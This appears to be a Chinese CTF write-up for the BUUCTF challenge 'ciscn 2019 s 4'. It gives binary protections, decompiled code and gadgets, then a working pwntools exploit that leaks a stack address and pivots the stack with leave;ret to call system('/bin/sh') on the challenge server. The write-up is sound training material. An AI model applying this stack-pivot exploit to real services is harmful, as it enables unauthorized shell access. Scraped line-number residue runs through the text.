ciscn 2019 s 4
# ciscn 2019 s 4
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/ciscn_2019_s_4/ciscn_s_4'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下:
int __cdecl main(int argc, const char **argv, const char **envp)
{
init();
puts("Welcome, my friend. What's your name?");
vul();
return 0;
}
1
2
3
4
5
6
7
2
3
4
5
6
7
vul函数如下:
int vul()
{
char s; // [esp+0h] [ebp-28h]
memset(&s, 0, 0x20u);
read(0, &s, 0x30u);
printf("Hello, %s\n", &s);
read(0, &s, 0x30u);
return printf("Hello, %s\n", &s);
}
1
2
3
4
5
6
7
8
9
10
2
3
4
5
6
7
8
9
10
hack函数如下:
int hack()
{
return system("echo flag");
}
1
2
3
4
2
3
4
Gadget:
ROPgadget --binary ciscn_s_4 --only "leave|ret"
Gadgets information
============================================================
0x080484b8 : leave ; ret
0x080483a6 : ret
0x080484ce : ret 0xeac1
Unique gadgets found: 3
1
2
3
4
5
6
7
8
2
3
4
5
6
7
8
# 思路分析
目前信息:
vul函数可溢出,但只能溢出2个栈帧,载荷不够plt表内有system,无/bin/sh字符串- No canary found
- NX enabled
- No PIE
思路:
2次read,第1次可以通过printf泄漏ebp地址,减去偏移后可计算出buf地址,第二次采用栈迁移解法,将/bin/sh写入buf处即可
# exp
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/ciscn_2019_s_4/ciscn_s_4'
io = remote('node4.buuoj.cn', 27018)
# io = process(pwnfile)
elf = ELF(pwnfile)
padding = 0x28
offset = 0x38
payload = flat(['a'*(padding-1), 'b'])
io.sendafter('your name?\n', payload)
io.recvuntil('b')
leak_ebp_addr = u32(io.recv(4))
buf_addr = leak_ebp_addr-offset
success('buf_addr :'+hex(buf_addr))
system_addr = elf.plt['system']
leave_ret_addr = 0x080484b8
payload = flat([buf_addr+0x100, system_addr,0xdeadbeef, buf_addr+16, '/bin/sh\x00'])
payload = payload.ljust(padding, b'\x00')
payload += flat([buf_addr, leave_ret_addr])
io.send(payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
上次更新: 2022/08/15, 00:29:49